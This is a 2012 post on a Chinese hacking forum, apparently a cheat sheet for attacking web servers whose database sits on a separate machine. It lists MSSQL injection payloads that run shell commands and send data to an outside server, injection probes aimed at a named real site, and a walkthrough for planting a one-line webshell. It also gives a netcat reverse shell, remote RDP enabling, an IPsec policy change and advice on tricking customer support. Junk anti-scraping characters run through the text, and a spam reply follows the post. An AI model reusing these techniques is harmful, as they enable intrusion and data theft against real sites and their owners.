找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3975|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关3 S3 {! V" G+ D* k9 S! c. Q
5 s- q1 e" Z& @* m2 z
: @0 e, \+ ]4 L3 j8 E/ r6 M
SA点数据库分离搞法+语句:/ J0 |" J- O! @& L

- o, ~0 a$ U3 c2 }, a& I9 }; |: \注射点不显错,执行下面三条语句页面都返回正常。; _  @0 q5 A9 [, H& c( y( T
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
' {# f. V  C- O; qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')0 {2 K# w9 t  }  `5 S7 }) Y
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'): [4 n0 z5 D7 f8 t# u0 M
可以列目录,判断系统为2000,web与数据库分离! i# M8 X. R) o& S; u
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
% n9 D& A, f3 n) _# ^+ A在注射点上执行
6 C& f$ {. P6 |- v9 i% Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
2 y3 Y0 `4 ^2 D+ H) E页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
2 `% ^& v) |8 Q' |+ i" b! }还有我用NC监听得其他端口都没有得到IP。
2 R# l% V8 h" u# s+ F9 f' ^
9 g+ I; Y: ^, n4 X' s通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
6 i* w+ D/ G4 |# P. P'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--) c$ N; H1 Y- [: r1 a/ E" J+ W9 s7 |( _# A

$ h$ |( k1 f* j: K+ [' \0 Q" P;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--0 `4 r/ K1 z" e7 D

% ]; R5 Z6 J( A. I4 U$ m- N$ E现在就猜想是不是数据库是内网而且不能连外网。7 |# A; T) y7 s! t$ m

; [" R' Q0 f6 @% L4 R; J1 A  u5 P- w  V
access导出txt文本代码
5 @" c, B$ a- H' p4 ?/ k1 PSELECT * into [test.txt] in 'd:\web\' 'text;' from admin+ }& x8 y& Y8 u' ^0 k, D

5 g9 C9 R; k7 V, r/ [4 Z; E5 s9 J- }  P+ S* [0 a/ z
# e0 Y/ X$ O- G3 H5 z6 q
自动跳转到指定网站代码头4 j8 N% I/ p" t3 d( J7 Z* W
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
* f9 f) ?4 H4 v  l2 ?
/ u0 u2 }3 i4 T1 V1 K  O' M: U" u6 X) r" c3 a  D
入侵java or jsp站点时默认配置文件路径:3 `8 d( m; l2 l" Z! v" f# U
\web-inf\web.xml
) W) J$ q9 @& o! W% ztomcat下的配置文件位置:1 ?1 N  ?; }! ~  f( v7 n9 j
\conf\server.xml            (前面加上tomcat路径)
3 f& n! O# F, K& q4 l! c\Tomcat 5.0\webapps\root\web-inf\struts-config.xml2 }% P5 Y4 D% `/ J( e
- n6 R: e* g, D9 F) @

# v/ m# S9 ?" @) n! \0 ^, p3 H3 \0 N6 D1 e& {$ |  p# _
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:. m( [& d- W% c9 t( o
-1%23% P1 k4 R4 A- c
> $ h0 i2 C5 ?" b" n2 Q$ W
<# W2 Y4 i' a9 i/ Y% T. z
1'+or+'1'='19 P( l8 N6 Q; R. M1 P: I  h5 G
id=8%bf6 d2 K+ T9 t! r& j4 }# a  ]" x

! I6 b2 L8 D8 M7 y  e) _全新注入点检测试法:1 y7 {% G* m7 c# d
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
/ \, c' ~1 m  y# {- D
$ w& B  a: J% ]" Q/ ?* l在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。8 x: E" z- x, G  \  ]# [" k4 F# z

4 [' _5 P* L* X6 X9 W9 \1 q5 I5 G, b搜索型注入判断方法:
) q7 j$ m, j& I/ M5 K北京%' and '1'='1' and '%'='0 J' C0 I6 Z" U" U1 C
北京%' and '1'='2' and '%'='
3 C, K% C6 [8 H7 g5 L/ O1 d
* `# z' E6 S  N2 W1 z% `3 V4 T1 U! [9 s6 G& p9 W
COOKIES注入:6 k0 w: X$ {7 B) N9 v

- E: z/ O8 O" V3 m  O5 Ujavascript:alert(document.cookie="id="+escape("51 and 1=1"));
, ^: }1 q1 f+ h0 [$ J" I5 w
) c2 K* d5 g9 T2 Y8 J* A# W2000专业版查看本地登录用户命令:( S% H5 A, m1 M. i  Z4 b
net config workstation; h& M) K# ~( n7 b5 g4 N
- i( l+ m& ~. B; U! J* z% G8 R
( D& W( M, }& {* L2 F
2003下查看ipsec配置和默认防火墙配置命令:
3 U0 }# U; F( I: znetsh firewall show config: c% N; C8 X5 p2 P- p0 y$ C6 S
netsh ipsec static show all
& {6 D" X) U; L' ^! z9 n" p' H
2 H+ k3 N( k% L9 C& ^不指派指定策略命令:5 d! }/ r+ |) q$ A5 z
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
, l8 |6 {2 q4 B1 ^& L* s. u3 X, o2 Cnetsh ipsec static show policy all  显示策略名
% J! i/ a4 `  [& g$ k1 [
+ o1 z" B! f1 u; {
- ]9 f5 Y# Y3 Z# [9 Z; j4 y! v猜管理员后台小技巧:* w) b+ ?8 y  q2 t$ G
admin/left.asp
. R2 u8 `$ G6 q; N$ Q! D( Padmin/main.asp
" S0 x  b1 ~- O( P" F/ z; @admin/top.asp
9 m/ D2 x; `. i5 Q2 I/ Badmin/admin.asp
  x; F! \) I+ f* z5 D" _2 b* w会现出菜单导航,然后迅雷下载全部链接9 I; L: V: ^+ e- w, [! I

4 P+ F7 @9 P2 {4 H+ t( c1 u$ d5 ^' m* d$ @1 q1 f) [
社会工程学:
8 S" r; G& l9 E3 p5 j5 e* }' x用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
! M" O& U( _/ j$ \5 D0 H6 ~% g然后去骗客服; W2 x5 T* e5 j: z6 A

1 X0 D( b) T7 `, ?; K% f  r3 p. h" g/ z% ]
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: , @2 _: o# y( I4 F' n
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ( I1 d5 j) n* b/ A5 d' G5 a( J5 ^
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
' Q/ j8 g0 {8 T
- {1 e) N8 X) B+ J( e
1 R$ H6 x6 S& W7 j- Q+ N# |2 ~8 D0 f
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
* R4 h; j+ b+ O! o- I: D. B' Y
6 g0 ~# {% t9 |" U2 s) i1 v0 ]
3 w. P, t: w" Z. y6 Q/ i. N) @: G$ K) M" x
CMD加密注册表位置* V7 @. H2 g' }. Q0 ?
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor: T% [1 Q4 Y& \# G7 G# G1 Q
AutoRun
9 ?* Q$ W+ e; c/ G9 U8 _5 _# M3 K8 p) G$ D. r5 w! P. {
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor2 `- o* }( A# M
AutoRun. D- n1 X9 C" Q7 K& r
& [/ a7 n1 Z0 Q* d" I

- f9 d, |6 n& D) e6 \在找注入时搜索Hidden,把他改成test/ S* R/ ^3 |. s6 O' b% u
; S( ]: b3 p; g0 C) @

9 L7 Y0 R  N3 ]1 L6 `
2 r7 \( \: E0 m* Hmstsc /v:IP /console
* Y4 a: V( O* c% a" P- Z0 h+ O* C  R$ @1 b
3 ]1 L2 K4 N' p% K) o; W* H6 a. q
一句话开3389:
5 d! N" h+ r0 k, E: k( P9 m* ^% u8 a) ]5 P" B
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  % a% ^8 \- e7 m& f1 x" R
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.; n  e0 j& g8 ~9 c5 t

' l& T& f5 ~( E0 D0 Q3 S4 o! Z& x% i% q( O; b- D) J& ~
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
* i, _# Z! t+ S  ?Insert into admin(user,pwd) values('test','test')% l1 g, f8 C+ |6 b5 C+ t* t

0 S" L& j6 Q$ w  A$ W2 R# [1 `- P7 X9 @# B3 \- b
NC反弹# l+ K7 B3 o, v, L$ l9 J
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
' ~: b( i1 a9 D1 N3 y, @1 [( k然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
7 _# D2 A5 i. {5 |/ A  \6 S- s. n! ]) C- ~- ^% l
5 Q& B% b% O- `* w! o
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题! O5 i5 N2 U7 U6 _: K$ C9 i" t

7 l  c4 _+ I+ |5 e5 p' O有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录2 g  M/ g$ P$ |! g0 [/ ]& B- D
例如:
7 T# s" R  Z" A. L$ [+ dsubst k: d:\www\ 用d盘www目录替代k盘6 f8 F9 `9 y4 C3 s
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表